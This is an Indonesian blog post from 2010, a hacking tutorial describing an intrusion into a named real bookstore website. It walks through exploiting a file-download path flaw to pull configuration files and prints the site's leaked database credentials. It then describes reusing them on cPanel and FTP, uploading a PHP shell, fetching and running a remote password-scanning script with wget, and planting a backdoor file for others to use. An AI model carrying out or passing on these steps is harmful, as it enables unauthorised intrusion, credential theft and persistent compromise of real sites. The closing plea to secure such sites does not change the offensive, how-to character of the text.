Ads 468x60px


9 April 2010

Ilmu Hack Dasar

Saya akan memberikan tutorial saya bagaimana menembus cpanel pada www.gerakbudaya.com, Mohon maaf jika tutorial ini agak panjang..karena saya mencoba membahas step-by-step
Awalnya saya mencari bugs fungsi get file, dan berharap semoga saja sang admin salah mendeklarasikan fungsi, query, atau path-nya dengan cara googling keyword inurl fungsigetfile). Fungsi getfile disini adalah file php untuk memproses download file bisa berupa download.php, getfile.php, savefile.php, dseterusnya bisa kita kembangkan sendiri kemungkinan2 yg ada. Bugs ini dapat menyebabkan kita bisa mendapatkan file2 php yg kita perlukan di dalam folder yg memiliki permission 777 atau 755
Seperti kita ketahui file php adalah file yang berisi bahasa pemrograman untuk memproses suatu data, yang source codenya tidak bisa kita lihat langsung kecuali file php berada di dalam html
OK lanjut…
saya mendapatkan target: “www.gerakbudaya.com/store/download.php?filename=” ok jika menemukan target seperti ini test dulu apakah vurnerable atau tidak dengan cara tambahkan pada string dibelakang file “download.php” sehinga url menjadi : www.gerakbudaya.com/store/download.php?filename=download.php jika berhasil mendownload file “download.php” bearti bugnya vurnerable dan bisa kita manfaatkan untuk mengambil file2 php lainnya termasuk file php untuk proses login atau file php untuk menghubungkan ke database.. Pertama2 kita cari dulu page admin/login berada, caranya dengan mengira2 lokasi path adminnya (misal: /admin, /administrator, /login, /admin.php, /login.php, dst) atau bisa dengan “cgiscan” Nah pada target ini saya menemukan pagenya di www.gerakbudaya.com/store/login.php (koq bisa nebak?? hehe kan udah ada linknya tinggal klik aja..;p) kalo login berupa form cari actionnya mengarah kemana caranya mudah saja lihat source code dan cari kata2 action=”", untuk target saya dapatkan diantara script: method=”get”>
Langkah selanjutnya download file “login.php” dengan memasukkan string pada bugs, sehingga url menjadi: www.gerakbudaya.com/store/download.php?filename=login.php kemudian buka file “login.php” dengan notepad, cari file prosesnya mengarah kemana..cari link file proses loginnya diantara kata2 includes atau required sebelum kata2 procces, untuk target saya dapatkan diantara script: require(’includes/application_top.php’) –> artinya mengarah ke “/includes/application_top.php” Download lagi file “/includes/application_top.php” dengan memasukkan string pada bugs, sehingga url menjadi: www.gerakbudaya.com/store/download.php?filename=includes/application_top.php
buka lagi file “aplication_top.php” dan cari lagi kata2 includes atau required, pada target saya dapatkan :// include server parameters require(’includes/configure.php’); —> artinya diproses oleh file “includes/configure.php”
Download file “includes/configure.php” tersebut dgn memasukkan string pada bugs, sehingga url menjadi: www.gerakbudaya.com/store/download.php?filename=includes/configure.php buka file tsb dan kita akan menemukan username database, password, dan database name. Pada target saya temukan diantara script: define(’DB_SERVER_USERNAME’, ‘gerakbdy_geraksi’); define(’DB_SERVER_PASSWORD’, ‘79578342′); define(’DB_DATABASE’, ‘gerakbdy_mainstore’);
artinya: database name=geraksi database password=79578342 database username=gerakbdy_mainstore username cpanel=gerakbdy *catatan:username dan password digunakan pada database phpmyadmin bukan pada admin user dan admin cpanel. okkk sampe sini istirahat dulu bentar, kalo udah lanjut lagi:
Control panel admin webmaster setahu saya ada dua jenis yaitu cpanel atau spanel, untuk login tinggal menambah path /cpanel atau /spanel dibelakan domain.. untuk cpanel, login phpmyadmin terpadu didala cpanel sehingga kita masih harus login terlebih dahulu pada cpanel. Sedangkan pada spanel login filemanager dan phpmyadmin dipisahkan, sehingga kita bisa langsung masuk ke database phpmyadmin dgn password dan username tadi tanpa harus login dulu ke panel admin..
Setelah saya mengecek whois domain, ternyata target menggunakan host civicbuilder.net yg menggunakan cpanel11, skrg coba kita login ke cpanel-nya pada url: www.gerakbudaya.com/cpanel —-> masukkan username gerakbdy dan password kita coba dgn password database atau username database atau kata2 lain yg kita dapatkan!!
*jika berhasil kita langsung dapat login ke filemanager
Kenapa pada password kita menggunakan pass db atau usrnm db, jawabannya simple karena psikologisnya, admin webmaster biasanya tidak mau repot mengahapal sekian banyak password cpanel, database, webmail, ftp, dl . Kalo belum berhasil login ke cpanel jgn gampang menyerah, kita coba dengan ftp, siapa tau kita bisa masuk. Dengan cara berikut: untuk tutorial ini penulis menggunakan mscmd pada
windows : - buka cmd prompt —> klik start->run->ketik “cmd” - pada cmd prompt ketik “ftp gerakbudaya.com” - kita akan ditanyakan username dan password, coba masukkan pass dan usrnm db, siapa tau beruntung? Dan ternyata anda benar ” i’m login succesfully”
wuihhhhh..akhirnya so selanjutnya apa?? yupz kita bisa langsung mengupload, mendownload, atau menghapus file, dll perintah command ftp bisa kalian lihat di http://www.nsftools.com/tips/MSFTP.htm Tapi gk seru ya kayaknya kalo gk dapet akses penuh ke cpanel..tenang ada caranya: coba kita upload sebuah shell ke dalam server melaui ftp.. setalah berhasil buka file shell-nya dan set konfigurasi kalo udah login ke phpshell..masukkan file untuk scan password target (cari di google atau buat sendirilah…usaha yaaa), caranya dengan perintah command linux:
“wget http://www.geocities.com/budak_dak_berez/scanpass.txt” —> tanpa tanda kutip kemudian rename file menjadi .php, caranya: ketik “mv scanpass.txt scanpass.php” —> tanpa tanda kutip ok sekarang coba jalankan file tersebut, dgn mengetikkan: “php scanpass.php” —> tanpa tanda kutip script akan scan semua user path yang memiliki config.php pada /home/ bukan /public_html/ atau wwwroot gotchaaa…saya menemukan usrnm gerakbdy dengan pass 79578342 catatan: ini pun masih membutuhkan sebuah keberuntungan dengan shell ini saya pun berhasil mempertahankan cpanel yg sempat diambil alih..namun setelah phpshel dan account ftp dihapus oleh webmaster saya hanya bisa gigit jari…;p buat rekan yg lain yg mungkin bisa memanfaatkan dan mengembangkan celah ini..saya menanamkan sebuah bugs fungsi get file dgn url “www.gerakbudaya.com/bahaya.php?filename=” pass dan usrnm db telah diganti admin webmaster menjadi:
username db: gerakbdy_geramm / geramm password db:
Ok frenz lanjutkan perjuangan saya, karena saya mohon pamit dulu untuk mundur, segala yg mengatasnamakan budak^dak^berez pada aksi hacking, defacing, dll bukanlah saya yg melakukannya.. catatan terakhir: saya sangat sedih karena bugs ini banyak saya temukan pada situs2 indonesia, tolong di secure!! Mohon maaf yg sebesar2nya jikalau ada kesalahan dan kekurangan pada tutorial ini, karena saya hanyalah manusia biasa Ingin belajar hacking silakan download ini